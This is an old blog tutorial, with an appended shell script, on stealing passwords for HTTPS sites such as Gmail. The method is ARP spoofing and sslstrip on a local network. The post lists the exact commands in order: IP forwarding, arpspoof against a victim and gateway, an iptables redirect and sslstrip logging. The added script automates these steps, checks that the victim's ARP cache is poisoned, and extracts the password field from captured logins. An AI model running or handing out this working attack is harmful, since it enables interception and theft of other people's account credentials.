Monday, February 8, 2010

How to decrypt https passwords

Description

This tutorial shows how to capture passwords for ssl (https) sites: email accounts, bank accounts and other secure sites that use ssl for encryption. Note that sslstrip does not break the encryption itself. It sits between the victim and the gateway and rewrites the https links the site sends into plain http links, so the victim's browser talks http to the attacker while the attacker talks https to the real site; the password therefore passes the attacker in the clear.
For example, when I log in to my gmail account, the Internet Explorer address bar shows
https://mail.google.com/mail/?shva=1#

If you type paypal.com, it automatically redirects to https://www.paypal.com/mv
Any site that works this way, where the user first arrives over plain http and is then sent to https, can have its password captured with sslstrip. The attack fails if the user types the https address directly or if the site and browser enforce https with HTTP Strict Transport Security (HSTS), which modern browsers support.

Before starting the attack, complete the 2 steps below.

1. Download BackTrack, burn it to a DVD, boot from the DVD and set the IP address.

2. The attacking PC and the victim PC need to be on the same network/LAN, because arp spoofing only works on the local segment. If the victim PC is in the 192.168.1.0 range
then the attacking PC also needs to be in the 192.168.1.0 range.

Steps to capture an email password using the sslstrip program


Basically this attack consists of 4 steps.

Step 1. Put the attacker machine in IP forwarding mode, so that it forwards the victim's packets on to the real gateway. Without this the victim loses connectivity as soon as the arp spoof starts and notices immediately.
#echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2. Start the arp spoof attack between the victim machine and the gateway: we send forged arp replies telling the victim machine that the gateway's IP address belongs to the attacker's MAC.
#arpspoof -i eth0 -t 192.168.50.5 192.168.50.1
-t is the target (victim ip, 192.168.50.5)
192.168.50.1 is the gateway you want to impersonate

To check that the arp spoof is working, ping the gateway, 192.168.50.1, from the victim machine
and then run arp -a on the victim.
The entries for the attacker and the gateway should show the same MAC address.

In the image, the gateway and the attacker PC have the same MAC address, 00-16-44-45-7e-c2, which means the arp spoof attack is working.

Step 3. Set up an iptables rule that redirects all http traffic from the victim PC to port 10000, where sslstrip is listening (10000 is sslstrip's default port; change it with -l if you use a different one).
Open a new console and type the following command.
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000


Step 4. Run sslstrip
#sslstrip -w secret

secret is the file name I want the results saved to as a log file.
From the victim PC, open the email site and log in.
Now use the less secret command to read the log file
and search for the email address and password.

If the log file is too long and you want to search for a particular user id, open it in less and search with /, as follows.
#less secret
#/infosec.tutorials

infosec.tutorials@gmail.com is the email address i used

Below is an image of the gmail account infosec.tutorials@gmail.com; I have removed the password field.
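The whole procedure above as one shell script, an added example that is not from the original post or from the sslstrip project. The four commands become functions that only print what they would run unless DRY_RUN=0, and the two checks the post does by hand (comparing the gateway's and attacker's MAC in the victim's arp -a output, and searching the log for the user id) become functions that work on text so they can be tried without a victim. The interface, the attacker's address 192.168.50.7, the sample arp table and the sample log lines are constructed assumptions; sslstrip's exact log line format is approximated.

```shell
#!/bin/sh
# Added example (not from the original post): the four sslstrip steps as
# functions, plus the two checks the post does by hand (is the victim's ARP
# cache poisoned? does the log hold the login?). Interface, addresses, the
# attacker IP 192.168.50.7 and the sample arp/log text are constructed.
IFACE="${IFACE:-eth0}"
VICTIM="${VICTIM:-192.168.50.5}"
GATEWAY="${GATEWAY:-192.168.50.1}"
SSLSTRIP_PORT="${SSLSTRIP_PORT:-10000}"   # sslstrip's default listen port
LOGFILE="${LOGFILE:-secret}"
DRY_RUN="${DRY_RUN:-1}"                   # DRY_RUN=0 on the attacker box really runs the tools

# Print the command instead of running it unless DRY_RUN=0.
run() {
    if [ "$DRY_RUN" = "1" ]; then echo "[dry-run] $*"; else "$@"; fi
}

# Steps 1-4 of the post. sysctl -w is the same as echo 1 > /proc/sys/net/ipv4/ip_forward;
# without forwarding the victim loses connectivity and notices at once.
run_attack() {
    run sysctl -w net.ipv4.ip_forward=1
    run arpspoof -i "$IFACE" -t "$VICTIM" "$GATEWAY" &
    run iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$SSLSTRIP_PORT"
    run sslstrip -l "$SSLSTRIP_PORT" -w "$LOGFILE"
}

# Remove the redirect and forwarding again (arpspoof re-ARPs the real MAC when stopped with Ctrl-C).
cleanup() {
    run iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$SSLSTRIP_PORT"
    run sysctl -w net.ipv4.ip_forward=0
}

# MAC listed for IP $2 in the `arp -a` text $1, in Windows (00-16-44-45-7e-c2) or
# Linux (00:16:44:45:7e:c2) form, normalised to lower-case colon form; empty if absent.
mac_for_ip() {
    ip_re=$(printf '%s' "$2" | sed 's/\./\\./g')
    printf '%s\n' "$1" \
        | grep -E "(^|[^0-9.])${ip_re}([^0-9.]|$)" \
        | grep -o -E '([0-9A-Fa-f]{2}[-:]){5}[0-9A-Fa-f]{2}' \
        | head -n 1 | tr '-' ':' | tr 'A-Z' 'a-z'
}

# Step 2 check: spoofing works when the gateway and the attacker share one MAC
# in the victim's ARP cache. Usage: arp_spoof_active "$arp_text" GATEWAY_IP ATTACKER_IP
arp_spoof_active() {
    gw_mac=$(mac_for_ip "$1" "$2")
    atk_mac=$(mac_for_ip "$1" "$3")
    [ -n "$gw_mac" ] && [ "$gw_mac" = "$atk_mac" ]
}

# Step 4 check: the "/infosec.tutorials" search from the post, over the log text.
# Prints matching lines prefixed with their line number.
find_credentials() {
    printf '%s\n' "$1" | grep -n -F -- "$2"
}

# One field of a captured POST body (values are left URL-encoded, e.g. %40 for @).
form_field() {
    printf '%s\n' "$1" | tr '&' '\n' | grep "^$2=" | head -n 1 | cut -d= -f2-
}

# Constructed `arp -a` output from the victim after poisoning: the gateway entry
# now carries the attacker's MAC from the post, 00-16-44-45-7e-c2 (attacker at .7).
POISONED_ARP='Interface: 192.168.50.5 --- 0xb
  Internet Address      Physical Address      Type
  192.168.50.1          00-16-44-45-7e-c2     dynamic
  192.168.50.7          00-16-44-45-7e-c2     dynamic
  192.168.50.255        ff-ff-ff-ff-ff-ff     static'

# The same cache before the attack (real gateway MAC constructed).
CLEAN_ARP='  192.168.50.1          00-1a-2b-3c-4d-5e     dynamic
  192.168.50.7          00-16-44-45-7e-c2     dynamic'

# Constructed text in the shape of an sslstrip -w log: one stripped Gmail login.
# The timestamp line and the Email/Passwd field names are assumptions.
SAMPLE_LOG='2010-02-08 10:12:31,402 SECURE POST Data (www.google.com):
ltmpl=default&Email=infosec.tutorials%40gmail.com&Passwd=example-pass&signIn=Sign+in
2010-02-08 10:13:05,117 POST Data (www.example.com):
q=hello'

case "${1:-}" in
    attack)  run_attack ;;
    cleanup) cleanup ;;
    demo)
        arp_spoof_active "$POISONED_ARP" "$GATEWAY" 192.168.50.7 && echo "sample arp table: spoof active"
        hit=$(find_credentials "$SAMPLE_LOG" infosec.tutorials)
        echo "$hit"
        echo "Passwd=$(form_field "${hit#*:}" Passwd)" ;;
esac
```

`sh sslstrip-demo.sh demo` exercises the two checks on the sample data; `DRY_RUN=0 sh sslstrip-demo.sh attack` on the BackTrack box runs the real commands as root, and `cleanup` removes the redirect and forwarding afterwards. The MAC comparison accepts both the Windows arp -a form shown on this page and the Linux colon form, so the same check works whichever system the victim runs.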
